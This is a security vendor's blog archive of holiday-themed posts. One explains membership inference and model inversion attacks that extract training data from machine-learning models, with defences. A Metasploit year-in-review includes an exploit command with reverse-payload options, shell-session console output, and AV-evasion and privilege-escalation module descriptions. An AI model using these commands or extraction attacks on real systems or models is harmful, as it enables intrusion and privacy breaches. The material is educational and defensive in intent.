Tag Archives: Hacky Holidays 2021

Being Naughty to See Who Was Nice: Machine Learning Attacks on Santa’s List

Post Syndicated from Erick Galinkin original https://blog.rapid7.com/2022/01/14/being-naughty-to-see-who-was-nice-machine-learning-attacks-on-santas-list/

Being Naughty to See Who Was Nice: Machine Learning Attacks on Santa’s List

Editor’s note: We had planned to publish our Hacky Holidays blog series throughout December 2021 – but then Log4Shell happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it’s 2022, we’re feeling in need of some holiday cheer, and we hope you’re still in the spirit of the season, too. Throughout January, we’ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let’s pick up where we left off.

Santa’s task of making the nice and naughty list has gotten a lot harder over time. According to estimates, there are around 2.2 billion children in the world. That’s a lot of children to make a list of, much less check it twice! So like many organizations with big data problems, Santa has turned to machine learning to help him solve the issue and built a classifier using historical naughty and nice lists. This makes it easy to let the algorithm decide whether they’ll be getting the gifts they’ve asked for or a lump of coal.

Being Naughty to See Who Was Nice: Machine Learning Attacks on Santa’s List

Santa’s lists have long been a jealously guarded secret. After all, being on the naughty list can turn one into a social pariah. Thus, Santa has very carefully protected his training data — it’s locked up tight. Santa has, however, made his model’s API available to anyone who wants it. That way, a parent can check whether their child is on the nice or naughty list.

Santa, being a just and equitable person, has already asked his data elves to tackle issues of algorithmic bias. Unfortunately, these data elves have overlooked some issues in machine learning security. Specifically, the issues of membership inference and model inversion.

Membership inference attacks

Membership inference is a class of machine learning attacks that allows a naughty attacker to query a model and ask, in effect, “Was this example in your training data?” Using the techniques of Salem et al. or a tool like PrivacyRaven, an attacker can train a model that figures out whether or not a model has seen an example before.

Being Naughty to See Who Was Nice: Machine Learning Attacks on Santa’s List

From a technical perspective, we know that there is some amount of memorization in models, and so when they make their predictions, they are more likely to be confident on items that they have seen before — in some ways, “memorizing” examples that have already been seen. We can then create a dataset for our “shadow” model — a model that approximates Santa’s nice/naughty system, trained on data that we’ve collected and labeled ourselves.

We can then take the training data and label the outputs of this model with a “True” value — it was in the training dataset. Then, we can run some additional data through the model for inference and collect the outputs and label it with a “False” value — it was not in the training dataset. It doesn’t matter if these in-training and out-of-training data points are nice or naughty — just that we know if they were in the “shadow” training dataset or not. Using this “shadow” dataset, we train a simple model to answer the yes or no question: “Was this in the training data?” Then, we can turn our naughty algorithm against Santa’s model — “Dear Santa, was this in your training dataset?” This lets us take real inputs to Santa’s model and find out if the model was trained on that data — effectively letting us de-anonymize the historical nice and naughty lists!

Model inversion

Now being able to take some inputs and de-anonymize them is fun, but what if we could get the model to just tell us all its secrets? That’s where model inversion comes in! Fredrikson et al. proposed model inversion in 2015 and really opened up the realm of possibilities for extracting data from models. Model inversion seeks to take a model and, as the name implies, turn the output we can see into the training inputs. Today, extracting data from models has been done at scale by the likes of Carlini et al., who have managed to extract data from large language models like GPT-2.

Being Naughty to See Who Was Nice: Machine Learning Attacks on Santa’s List

In model inversion, we aim to extract memorized training data from the model. This is easier with generative models than with classifiers, but a classifier can be used as part of a larger model called a Generative Adversarial Network (GAN). We then sample the generator, requesting text or images from the model. Then, we use the membership inference attack mentioned above to identify outputs that are more likely to belong to the training set. We can iterate this process over and over to generate progressively more training set-like outputs. In time, this will provide us with memorized training data.

Note that model inversion is a much heavier lift than membership inference and can’t be done against all models all the time — but for models like Santa’s, where the training data is so sensitive, it’s worth considering how much we might expose! To date, model inversion has only been conducted in lab settings on models for text generation and image classification, so whether or not it could work on a binary classifier like Santa’s list remains an open question.

Mitigating model mayhem

Now, if you’re on the other side of this equation and want to help Santa secure his models, there are a few things we can do. First and foremost, we want to log, log, log! In order to carry out the attacks, the model — or a very good approximation — needs to be available to the attacker. If you see a suspicious number of queries, you can filter IP addresses or rate limit. Additionally, limiting the return values to merely “naughty” or “nice” instead of returning the probabilities can make both attacks more difficult.

For extremely sensitive applications, the use of differential privacy or optimizing with DPSGD can also make it much more difficult for attackers to carry out their attacks, but be aware that these techniques come with some accuracy loss. As a result, you may end up with some nice children on the naughty list and a naughty hacker on your nice list.

Santa making his list into a model will save him a whole lot of time, but if he’s not careful about how the model can be queried, it could also lead to some less-than-jolly times for his data. Membership inference and model inversion are two types of privacy-related attacks that models like this may be susceptible to. As a best practice, Santa should:

  • Log information about queries like:
    • IP address
    • Input value
    • Output value
    • Time
  • Consider differentially private model training
  • Limit API access
  • Limit the information returned from the model to label-only


Get the latest stories, expertise, and news about security today.

More Hacky Holidays blogs

The 2021 Naughty and Nice Lists: Cybersecurity Edition

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/01/10/the-2021-naughty-and-nice-lists-cybersecurity-edition/

The 2021 Naughty and Nice Lists: Cybersecurity Edition

Editor’s note: We had planned to publish our Hacky Holidays blog series throughout December 2021 – but then Log4Shell happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it’s 2022, we’re feeling in need of some holiday cheer, and we hope you’re still in the spirit of the season, too. Throughout January, we’ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let’s pick up where we left off.

It’s not just Santa who gets to have all the fun — we in the security community also love to make our lists and check them twice. That’s why we asked some of our trusty cybersecurity go-to’s who and what they’d place on their industry-specific naughty and nice lists, respectively, for 2021. Here’s who the experts we talked to would like to give a super-stuffed stocking filled with tokens of gratitude — and who’s getting a lump of coal.

The nice list

Call me boring, but I am pretty stoked about the Minimum Viable Security Product (MVSP), the vendor-neutral checklist for vetting third-party companies. It has questions like whether a vendor performs annual comprehensive penetration testing on systems, complies with local laws and regulations like GDPR, implemented single sign-on, applies security patches on a frequent basis, maintains a list of sensitive data types that the application is expected to process, keeps an up-to-date data flow diagram indicating how sensitive data reaches the systems, and whether vendors have layered perimeter controls or entry and exit logs for physical security. Its success depends on people using it, and this industry tends to be allergic to checklists, but it strikes me as super important. – Fahmida Y. Rashid, award-winning infosec journalist

Editor’s note: Check out our Security Nation podcast episode with Chris John Riley on his work helping develop MVSP.

All of the security researchers that have focused their research and efforts to identify vulnerabilities and security issues within IoT technology over the last year. Their effort have helped bring focus to these issues which has led to improvements in product and processes in the IoT industry. – Deral Heiland, IoT Research Lead at Rapid7

Increased federal government focus on securing critical infrastructure. Examples: pipeline and rail cybersecurity directives, energy sector sprints, cybersecurity funding in the infrastructure package. – Harley Geiger, Senior Director of Public Policy at Rapid7

Huntress Labs and the Reddit r/msp board for their outstanding, tireless support for those responding to the Kaseya mass ransomware attack. While the attack was devastating, the community coalesced to help triage and recover, showing the power we have as defenders and protectors when we all work together. – Bob Rudis, Chief Security Data Scientist at Rapid7

The January 20th swearing-in of Biden is on the nice list, not because of who won but the fact that the election worked. We’ve talked an excessive amount about election security, but the reality is, there was no big deal. It was a largely unremarkable election even in the abnormal environments of the pandemic and the cyber. Election computers will continue to be wildly insecure, but since we’ve got paper trails, it won’t really matter. – Rob Graham, CEO of Errata Security

The naughty list

The Colonial Pipeline and Kaseya attacks are far above any other “naughty” case. They affected millions of people around the world. However, like the big things from past years, I think it’ll be solved by lots of small actions by individuals rather than some big Government or Corporation initiative. No big action was needed to solve notPetya or Mirai; no big action will be needed here. Those threatened will steadily (albeit slowly) respond. – Rob Graham, CEO of Errata Security

Microsoft, bar none. They bungled response to many in-year critical vulnerabilities, putting strain on already beat up teams of protectors, causing many organizations to suffer at the mercy of attackers. Everything from multiple, severe Exchange vulnerabilities, to unfixable print spooler flaws, to being the #1 cloud document service for hosting malicious content. – Bob Rudis, Chief Security Data Scientist at Rapid7

The whole Pegasus spyware from NSO Group is bad news start to finish, but the fact that the ruler of United Arab Emirates used the spyware on his wife in a custody battle? That was just flabbergasting. We talk about stalkerware and other types of spyware — but when you have something like Pegasus just showing up on individual phones, that is downright frightening. – Fahmida Y. Rashid, award-winning infosec journalist

All manufacturers of IoT technology that have not heeded the warnings, taken advantages of the work done by IoT security researchers to improve their product security, or made efforts to build and improve their internal and external process for reporting and remediating security vulnerabilities within their products. – Deral Heiland, IoT Research Lead at Rapid7

Apparent lack of urgency to provide support and phase in requirements for healthcare cybersecurity, despite ransomware proliferation during the pandemic. – Harley Geiger, Senior Director of Public Policy at Rapid7


Get the latest stories, expertise, and news about security today.

More Hacky Holidays blogs

2022 Cybersecurity Predictions: The Experts Clear Off the Crystal Ball

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/01/06/2022-cybersecurity-predictions-the-experts-clear-off-the-crystal-ball/

2022 Cybersecurity Predictions: The Experts Clear Off the Crystal Ball

As we walk through the doorway of 2022, it’s hard not to wish at least some among us had the gift of cosmic foresight. Many (most?) of the questions we thought in 2021 that we’d have answered by this point — chief among them, when will COVID finally leave us alone??? — still seem to elude us.

In keeping with our yearly tradition, we sat down with some experts at Rapid7 and across the industry to get their 2022 cybersecurity predictions. Here’s a look at what those in the know — some of them under the guise of clever fortune-teller names — think we’ll be talking about in the year to come.

Rob la Mystique (a.k.a. Robert Graham, CEO of Errata Security)

My third eye tells me that ransomware will become state-sponsored. Governments will notice the successful actors in their countries, and rather than shut them down, they’ll seek to co-opt their activities. In other words, pirates will be coopted into privateers.

Fahmida Y. Rashid, award-winning infosec journalist

I think we will see some surprising consolidation — some giant merger that’s going to dwarf even the ones we’ve seen so far. There’s still going to be insane venture funding rounds (like Transmit Security’s Series A) for security startups. But I think my prediction is that we are going to see the pendulum swing back from tools that do one thing well to large suites/integrated platforms that do all kinds of things, so the whole buying landscape is going to get even more murky and confusing.

Tod Beardsley, Director of Research at Rapid7

In 2022, managed service providers (MSPs) will continue to be in the hot seat as intermediary targets for ransomware gangs. The efficacy of hitting MSPs was proven out in 2021, and even small, regional MSPs will need to stay on their toes with patches and two-factor authentication everywhere to avoid getting exploited and phished by attackers who are targeting their downstream customers.

As cryptocurrency valuations continue to separate themselves from any realistic evidence of value, we will see more and more exchanges and clearinghouses get compromised, resulting in heists of millions of dollars’ worth of crypto — especially among off-shore exchanges.

Cyber-Zoltar the Blockchain Seer (a.k.a. Philip Amann, Head of Strategy at the European Cybercrime Center)

Ransomware will continue to dominate and proliferate with cybercriminals further moving toward a more calculated target selection. As is evidenced by several high-profile ransomware attacks, this has created a global cybersecurity risk that goes beyond the financial impact of these attacks. This will continue to be supported by a professional underground economy that provides the necessary tools and services.

We also expect investment fraud, BEC and CEO fraud to continue to cause disruptive losses and also a significant increase in mobile malware. The response to these threats will require us to further strengthen collaboration among law enforcement, industry, the CSIRT community, and academia globally with a view to collectively increasing cybersecurity, safety, and resilience.

Bob Rudis, Chief Security Data Scientist at Rapid7

The 2022 US election season will drive multiple (some impactful) cyberattacks on candidate/party technical and campaign logistics infrastructure and data from US-based sources.

Meanwhile, as companies accelerate toward a higher office-vs.-remote work ratio, initial access brokers will take advantage of the mobility (and weaknesses) in BYOD endpoints to gain footholds and refresh credentials and PII data stores. Multiple, major breaches will be reported.

In addition, the adoption of Software Bill of Materials (SBOM) will be astonishingly fast (in the US) toward the latter half of the year, heralding a new era of better third-party risk management and overall organizational safety and resilience.

Erick Galinkin, Principal Artificial Intelligence Researcher at Rapid7

Ransomware will continue to be a huge threat and will draw even more attention in 2022. While we should keep an eye out for potential attempts to disrupt a major US government agency, the revenue lost from ransomware will still be an order of magnitude less than business email compromise.

The media world and the security world will do their gnashing of teeth and rending of garments over deepfakes ahead of the 2022 midterms, but AI-powered disinformation will continue to be a mostly hypothetical threat.

Madame Bell LaPadula (a.k.a. Wendy Nather, Head of Advisory CISOs at Cisco)

On the heels of more visibility in supply chain security, and against the backdrop of steady disruption from ransomware, the security industry will have to face another maturity touchstone. It’s not enough simply to provide more transparency and share more data: what else do we owe one another in this broad ecosystem? SBOMs are the new shiny, but we will have to take many more steps together to improve our common, global defense.

Harley Geiger, Senior Director of Public Policy at Rapid7

State and federal agencies will step up their enforcement of existing cybersecurity regulations. This includes the SEC’s enforcement of required disclosures related to cybersecurity, DOJ’s enforcement of federal contractor cybersecurity requirements, and California’s enforcement of the CCPA.

But while regulators may issue new cybersecurity rules for the private sector under existing authorities, Congress will delay creating new federal authorities due to the midterm election year and the recent passage of large spending and incident reporting bills. Divisive items like federal privacy legislation are unlikely to pass. However, there will be plenty of hearings, press releases, and tweets expressing concern for ongoing cybersecurity threats!


Get the latest stories, expertise, and news about security today.

More Hacky Holidays blogs

Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/01/05/rapid7-2021-wrap-up-highlights-from-a-year-of-empowering-the-protectors/

Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors

Now that 2022 is fully underway, it’s time to wrap up some of the milestones that Rapid7 achieved in 2021. We worked harder than ever last year to help protectors keep their organization’s infrastructure secure — even in the face of some of the most difficult threats the security community has dealt with in recent memory. Here’s a rundown of some of our biggest moments in that effort from 2021.

Emergent threats and vulnerability disclosures

As always, our Research and Emergent Threat Response teams spent countless hours this year tirelessly bringing you need-to-know information about the most impactful late-breaking security exploits and vulnerabilities. Let’s revisit some of the highlights.

Emergent threat reports

Vulnerability disclosures

Research and policy highlights

That’s not all our Research team was up to in 2021. They also churned out a wealth of content and resources weighing in on issues of industry-wide, national, and international importance.

The Rapid7 family keeps growing

Throughout 2021, we made some strategic acquisitions to broaden the solutions we offer and help make the Insight Platform the one-stop shop for your security program.

Industry accolades

We’re always thrilled to get industry recognition for the work we do helping protectors secure their organizations — and we had a few big nods to celebrate in 2021.

Keeping in touch

Clearly, we had a pretty busy 2021 — and we have even more planned for 2022. If you need the latest and greatest in security content to tide you over throughout the last few weeks of the year, we have a few ideas for you.

Stay tuned for more great content, research, and much more in 2022!


Get the latest stories, expertise, and news about security today.

Metasploit 2021 Annual Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/01/05/metasploit-2021-annual-wrapup/

Metasploit 2021 Annual Wrap-Up

As 2022 kicks off, we now have another year in the books. Like years past, 2021 brought some surprises and had its share of celebrity vulnerabilities and recurring trends. Let’s highlight some statistics!

Quick stats

  • 651 merged pull requests from 113 users
  • 184 new modules
    • 102 exploits, 45 post, 32 auxiliary, 3 payload, and 2 evasion
  • 1 Metasploit Community CTF hosted
    • 1,501 users registered across 727 teams
    • 18 total challenges
    • 1,264 correct challenge submissions

URI support

As of Metasploit 6.1.4, users can now supply URI strings as arguments to the run command to specify RHOST values and option values at once:

use exploit/linux/postgres/postgres_payload
run postgres://administrator:[email protected] lhost= lport=5000

This new workflow will not only make it easier to use reverse-i-search with CTRL+R in Metasploit’s console — it will also make it easier to share cheat sheets among pentesters. Support includes HTTP, MySQL, PostgreSQL, SMB, SSH, and more; check out the full announcement post.

Sessions without payloads

Metasploit 2021 Annual Wrap-Up

AV evasion is a hard problem that’s not going to be solved in the foreseeable future. Payloads are caught in a variety of ways by a variety of AVs. One sustainable approach Metasploit is attempting to take is to enable users to leverage sessions that don’t require payload code to be running on the target. While not always a feasible solution, when it is, it can be quite reliable.

Earlier in 2021, community member smashery took on a large effort to enable Metasploit users to obtain interactive command shell sessions using Microsoft’s WinRM. The result is an improvement that enables the scanner/winrm/winrm_login module to open a command shell session without having uploaded a payload to the target. This session can then of course be used with post modules that are compatible with shell payloads.

msf6 auxiliary(scanner/winrm/winrm_login) > run username=Administrator password=pass rhost=

[!] No active DB -- Credential data will not be saved!
[+] - Login Successful: WORKSTATION\Administator:pass
[*] Command shell session 4 opened ( -> ) at 2021-12-17 14:14:25 +0000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

In a similar vein, Metasploit has for a while now had the ability to open command shell sessions from the scanner/ssh/ssh_login module. These command shell sessions could also be used with post modules that didn’t require full Meterpreter sessions. However, one notable feature that SSH servers did not support until 2021 was the ability to port-forward over these connections. Last year saw improvements to Metasploit’s handling of SSH sessions that enable both standard port forwarding (for client connections) and reverse port forwarding (for server connections). Being fully wired into Metasploit, so to speak, means users can forward connections over them using the route command in the same way they can with Meterpreter sessions.

We hope these new capabilities provide users with more options to perform their testing from Metasploit while keeping payloads entirely out of memory.

Evasion modules

Evasion modules are one of Metasploit’s most infrequently added types, but they are certainly noteworthy when they are added. Last year saw two such modules added, both targeting Windows executables. The first module, based on Johnny Shaw’s work, implemented Process Herpaderping. This novel technique obfuscates the payload’s main logic from security products. This technique was effective for a few months but was ultimately added as a detection to Windows Defender.

Another evasion module added this year was kensh1ro’s syscall module. Using direct system calls is a popular technique to evade user-mode analysis hooks, and this module brings the capability to Metasploit, too.

RDLL exploit improvements

Last year, the post exploit library used by quite a few Windows local exploits saw a great improvement that reduced code reuse and laid the foundation to randomize the target process used to host the injected DLL. Prior to this, most exploits would start notepad using a piece of template code that would then load the RDLL and, when successful, execute the payload. This often led to the notepad process making network calls, which is pretty easily identified as malicious behavior. Instead, these modules will now randomly select a binary from a list and automatically start a process of the correct architecture. No more notepad instances making network calls from exploits. Currently, the new implementation will randomly select between msiexec and netsh, both of which are widely available across Windows versions and are less likely to be identified when making network connections.

Kubernetes support

It’s safe to say that cloud computing is here to stay. Metasploit added the first modules that target the Kubernetes platform. The first module is an auxiliary module that is capable of enumerating namespace, pod, and secret information. Following up on that is an exploit module that, when provided the necessary credentials, can execute a payload within a pod. In a similar vein to the previously mentioned payload-less post-exploitation capabilities, this module can also open a direct command shell session using a new, native WebSocket implementation. We hope these modules help Metasploit users who are testing these environments and look forward to expanding on the capabilities in 2022.

Session validation

Being a framework, Metasploit offers a variety of payloads and session types. Unfortunately, not every payload yields a session type with the same capabilities (e.g. the PHP Meterpreter does not offer Kiwi). This can be very confusing for users as they’re attempting to use various post modules and Meterpreter commands. Last year, Metasploit improved the way this is handled and now offers concise error messages when certain capabilities are missing or can’t be performed with a particular session type. Now running a Meterpreter command that’s either unsupported or provided by an extension that hasn’t been loaded will be reported as such.

meterpreter > creds_all
[-] The "creds_all" command requires the "kiwi" extension to be loaded (run: `load kiwi`)
meterpreter > load kiwi
Loading extension kiwi...
[-] Failed to load extension: The "kiwi" extension is not supported by this Meterpreter type (python/osx)
[-] The "kiwi" extension is supported by the following Meterpreter payloads:
[-]   - windows/x64/meterpreter*
[-]   - windows/meterpreter*

Improved SMB capture server

SMB1 has not been enabled by default in Windows 10 since 2017. Last year, Metasploit began the long process of updating the SMB server capabilities to work with the modern SMB 2 and SMB 3 versions. The first milestone allowed the capture server (auxiliary/server/capture/smb) that collects authentication information from incoming client connections to be upgraded to support incoming connections from SMB 2 and SMB 3 clients. Today, the capture server can be used with modern versions for Windows, in their default configuration.

New module highlights

  • exploits/windows/http/exchange_proxylogon_rce – This was the first of two high-profile Exchange RCEs added to Metasploit and highlighted the need for administrators to stay on top of patching their on premises Exchange servers or migrate.
  • exploit/multi/http/git_lfs_clone_command_exec – This exploit brought along with it new capabilities for Metasploit to act as a malicious Git server. This opens the door for future modules to exploit similar vulnerabilities.
  • [exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe])(https://github.com/rapid7/metasploit-framework/pull/15567) eBPF has been a popular target for Linux LPEs this year. This particular exploit, based on @chompie1337’s original research was particularly valuable due to the number of platforms it affected as well as its reliability. Speaking of reliability…
  • exploits/linux/local/sudo_baron_samedit – Being January 2022, this particular celebrity vulnerability seems like old news. At the time, however, it gained quite a bit of attention, as it was in the ever-prevalent sudo utility. One quality that made this exploit particularly valuable was that there is no risk of system instability while exploiting it. This will likely remain a go-to exploit for users needing to escalate on Linux systems in years to come.
    auxiliary/gather/windows_secrets_dump – While not technically a new module, this particular entry saw a massive improvement in its addition of support for targeting Domain Controllers. This was a monumental effort that included a foundation that also makes it easier for modules to run attacks over DCERPC (think PrintNightmare and ZeroLogon).
  • exploit/multi/http/cve_2021_35464_forgerock_openam – Any unauthenticated RCE in an application that’s intended to be an IAM solution is worth calling out.
  • post/windows/gather/credentials/windows_sam_hivenightmare – This was another highly reliable privilege escalation technique that could be used to recover sensitive files on Windows systems. The module’s implementation performs the entire operation in memory using Meterpreter with spawning new processes or dropping artifacts to disk, making it a very stealthy approach.


Get the latest stories, expertise, and news about security today.

5 Security Projects That Are Giving Back

Post Syndicated from Jacob Roundy original https://blog.rapid7.com/2022/01/04/5-security-projects-that-are-giving-back/

5 Security Projects That Are Giving Back

Editor’s note: We had planned to publish our Hacky Holidays blog series throughout December 2021 – but then Log4Shell happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it’s 2022, we’re feeling in need of some holiday cheer, and we hope you’re still in the spirit of the season, too. Throughout January, we’ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let’s pick up where we left off.

While it’s always nice to receive gifts, the holiday season is more about giving – whether you’re buying something nice for the people you love or giving back to the community to help ensure others enjoy the holidays as much as you do.

Giving back is exactly what we’ll be focusing on in today’s Hacky Holidays post, as it’s a theme that truly resonates with those in the security industry. From white-hat hackers to those volunteering their time to make the internet a safer, more inclusive space, we’ve highlighted a few security-related projects that exemplify the spirit of giving back.

1. The Innocent Lives Foundation

The Innocent Lives Foundation aims to identify child predators and help bring them to justice. They do this by leveraging the combined power of the information security community to create tools that unmask anonymous child predators online. Then, using the data from Open Source Intelligence and cutting-edge techniques, they build a path to capturing evidence and then pass on those details to law enforcement for them to recreate.

The Innocent Lives Foundation was first started by Chris Hadnagy, who joined us on an episode of our Security Nation podcast back in 2020. He worked on a few cases at Social-Engineer, LLC, that tracked and captured predators who trafficked and exploited children. When he saw the impact these crimes had on innocent people, he knew he had to do something about it. As a leader in the information security community, he chose to rally a group of security experts and professionals in the social engineering field to address these problems and prevent crimes against future victims.

The foundation is serving endangered children and building a world in which all children can live innocent lives. It’s difficult, emotionally taxing work, but it’s making the world a better place, and it’s the perfect example of giving back.

If you’d like to donate to the cause — it can cost up to $10,000 to produce one file to send to law enforcement, so donations are needed and welcomed — you can do so here. Aside from donating, there are numerous other ways to get involved, including reporting a case, sharing support online, or even volunteering your security skills when applications are opened.

2. No More Ransom

Today, ransomware is rampant. This fact won’t surprise anyone working in the security industry, but many normal users around the world don’t know what ransomware is, how to defend against it, and what to do if they fall victim to a scam. That’s where No More Ransom comes into play.

No More Ransom is an initiative by the National High Tech Crime Unit of the Netherlands’ police, Europol’s European Cybercrime Centre, Kaspersky, and McAfee with a simple mission: to help victims of ransomware retrieve their encrypted data without paying criminals a single dime in the process.

The initiative aims to achieve this mission in two ways:

  1. By compiling a repository of keys and applications that can decrypt data locked by different types of ransomware
  2. By spreading awareness about ransomware and educating the world about prevention methods they can employ in their daily lives

While it’s not always possible to regain access to files encrypted by or systems locked by ransomware, No More Ransom has helped many do exactly that with its repository. And by sharing simple, easy-to-follow cybersecurity advice, the initiative is creating a better informed world of users who understand how to prevent falling victim to ransomware in the first place.

In the 5 years of since its creation, the No More Ransom initiative has:

  • Built a library of 121 free tools
  • Been able to decrypt 151 ransomware families
  • Seen more than 6 million downloads of its tools
  • Prevented $900 million in criminal profit

If you’d like to do your part, the No More Ransom project is always looking for new partners to spread their messaging, so if your organization wants to be more security-minded and give back to the security community in general, consider joining the list of many partners. If you ever fall victim to ransomware, you can also report the crime, which will help identify new types of ransomware and aid future prevention.

3. CIAS Gaming

Established by the University of Texas at San Antonio, the Center for Infrastructure Assurance and Security (CIAS) conducts research into effective ways to engage students with cybersecurity principles through educational gaming — and as part of their work, they’re making cybersecurity relatable, fun, and engaging for kids.

The CIAS Gaming program targets 4 demographics: elementary school, middle school, high school, and colleges and universities. Their mission is to deliver quality research, training, competition, and exercise programs to advance community and organizational cybersecurity capabilities and collaboration.

Currently, the CIAS K-12 Program consists of a few educational tools. These include:

  • A collectible card game and electronic download called Cyber Threat Defender
  • A multiplayer card game for students in third through fifth grade called Cyber Threat Protector
  • A card game for K-2 players with simple design and reinforced concepts called Cyber Threat Guardian
  • An electronic game that teaches techniques for encoding and decoding ciphers to hide or discover information called Project Cipher
  • A testing tool and platform that gives educators a way to create quizzes and introduce students to cybersecurity principles called the Pyramid of Knowledge
  • Interactive activities, like activity sheets and games, introduced to kids by the CyBear cybersecurity mascots

CIAS Gaming is shaping the future of cybersecurity by training the next generation in cybersecurity best practices. You can access and download these tools and games via the links above, or reach out directly to CIAS to learn more about taking part in their competitions or trainings.

4. The Alliance for Securing Democracy

The Alliance for Securing Democracy (ASD) is a nonpartisan initiative housed within the German Marshall Fund of the United States that aims to combat autocratic efforts to undermine and interfere in democratic institutions around the world. The ASD contributes research and analysis on how a range of tools, from cyberattacks and disinformation to support for extremism, are being used to weaken democracies. It also provides public dashboards to expose the effects of online influence networks and the themes being promoted by foreign powers to threaten democratic institutions.

The ASD is independently funded by more than 175 private individuals and small family foundations across the political spectrum. Its team brings together a diverse staff with expertise across industries, including technology and cybersecurity, to provide research, policy recommendations, and even analysis of key issues and threats. It also has a technical advisory committee that features experts on disinformation, cybersecurity, illicit finance, and more.

The ASD has conducted a significant amount of work in the area of cybersecurity. It also has compiled a toolbox to spread awareness on various techniques being used by malign actors. Such tools include:

In a more globalized and digitalized world, the work ASD is doing to protect the strength of free and open societies by shining a light on autocratic tactics, closing vulnerabilities in democratic systems, and imposing costs on those who undermine our institutions is more important than ever. You can reach them at [email protected] or donate to the cause.

5. Code for Social Good

Code for Social Good is a nonprofit organization that partners with other nonprofit companies to provide the technical help they need to achieve their missions for no cost. It’s all about volunteering to promote social good: Code for Social Good has built and fostered a volunteer community that promotes welfare by supporting nonprofits in need. And that global network consists of professionals from across the tech industry, including technical writers, coders, programmers, and more.

Whether you code for fun, experience, social good, or to make a better world, volunteering at Code for Social Good is a great way to give back. Anyone can sign up as a volunteer, and then, you can browse their list of projects. If you find one applicable to your skills, you can apply and wait for contact from the nonprofit. Nonprofits that need help can also post projects on the site and find volunteers to assist them.

As of this writing, Code for Social Good has 138 projects posted across 122 organizations based in 87 countries. The current volunteer community consists of 2,595 volunteers, and they’re always looking for more help. If you have some extra time, why not take a look and see if you can give back by volunteering your technical skills to a nonprofit in need.

Giving back is an important theme of the holidays and one that’s integral to the cybersecurity community. By giving back to the industry, we can encourage a healthy, flourishing practice that spreads awareness, leading to a better, safer, and brighter tomorrow.

If you’re looking for ways to give back, hopefully these examples inspire you to action. If you’d like to stay in the holiday spirit, check out the rest of our Hacky Holidays specials.


Get the latest stories, expertise, and news about security today.

Sharing the Gifts of Cybersecurity – Or, a Lesson From My First Year Without Santa

Post Syndicated from Amy Hunt original https://blog.rapid7.com/2022/01/03/sharing-the-gifts-of-cybersecurity-or-a-lesson-from-my-first-year-without-santa/

Sharing the Gifts of Cybersecurity – Or, a Lesson From My First Year Without Santa

Editor’s note: We had planned to publish our Hacky Holidays blog series throughout December 2021 – but then Log4Shell happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it’s 2022, we’re feeling in need of some holiday cheer, and we hope you’re still in the spirit of the season, too. Throughout January, we’ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let’s pick up where we left off.

My kid stopped believing this year.

I did what they recommend: said she was big enough to know the truth, that we are all Santas, and now she must be one, too. Every one of us — whether December means Christmas, Hanukkah, Kwanzaa, or just winter — is expected to give generously and sometimes anonymously, just to spread the goodness. And ideally, we do it a whole lot more than once a year.

Then, the a-ha moment arrived. You know who some of the best Santas on Earth are? The cybersecurity community. It’s full of givers, mostly with names we’ll never know.

Rewind to the early years of the internet: A 15-year-old hacked the source code for NASA’s International Space Station; Russians extracted $10 million from Citibank; the Department of Justice and Los Alamos National Laboratory (site of the Manhattan Project and home to classified nuclear and weapons secrets) were breached.

What happened next? Organized beneficence

In 1999, MITRE researchers released the first searchable public record of 321 common vulnerabilities. In less than 3 years, there were 2,000+ vulnerabilities shared. By 2013,  the effort resulted in the MITRE ATT&CK Framework that documented attacker tactics and techniques based on real-world observations of advanced persistent threat actors. With this framework, the security community has a common language and library to understand attackers — and what we can do to stop them.

MITRE ATT&CK is open and available to anyone for use at no charge. Of course, detailed ATT&CK mapping is part of InsightIDR’s vast library of critical attacker behaviors and endpoint detections.

Not long after MITRE published its first vulnerabilities, military systems at the Pentagon and NASA were breached by a guy looking for evidence of UFOs. The fun never ends. That same year, security expert and open source guru H.D. Moore released the first edition of his Metaspoit Project with 11 exploits. Metasploit 2.0 followed quickly. With the 3.0 release, users began to contribute and a community was born.

Today, Rapid7’s Metasploit is a voluntary collaboration between 300,000+ users and contributors around the world, including Rapid7 security engineers. It includes more than 1677 exploits organized over 25 platforms, and nearly 500 payloads. And it’s a favorite of pen testers and red teamers worldwide.

The Cyber Threat Alliance took everything up a notch

A nonprofit working to improve the security of our global digital ecosystem by enabling near real-time, high-quality threat information sharing, the Cyber Threat Alliance (CTA) has staff and a technology platform for sharing advanced threat data. CTA members — often competitors — work together in good faith to distribute timely, actionable, contextualized, and campaign-based intelligence.

Rapid7 is among the members who, on average, share 5 million observable events per month. And the result: We all get ever-better at thwarting adversaries and improving our collective security.

In 2017, the holiday spirit became a quarterly thing for us

That’s the year Rapid7 released our first threat intelligence report. Today, our quarterly Threat Reports share clear, distilled learnings and practical guidance from the wealth of data we continuously gather. Our sources include:

  • Metasploit, now the world’s most used pen testing framework
  • Rapid7’s Insight platform, covering vulnerability management, application security, detection and response, external threat intelligence, orchestration and automation, and more
  • Rapid7’s Project Sonar, which conducts internet-wide surveys across more than 70 different services and protocols to gain insights into global exposure to common vulnerabilities typically unknown to IT teams
  • Project Heisenberg, a globally distributed, low-interaction honeypot network that monitors for malicious inbound connections, and a forum for collaboration and confirmation relationships with other internet-scale researchers
  • Our global network of Managed Detection and Response (MDR) SOCs that use and vet Rapid7 products, do proactive threat hunting along with daily triage and remote incident response, and provide raw intelligence around emergent threats

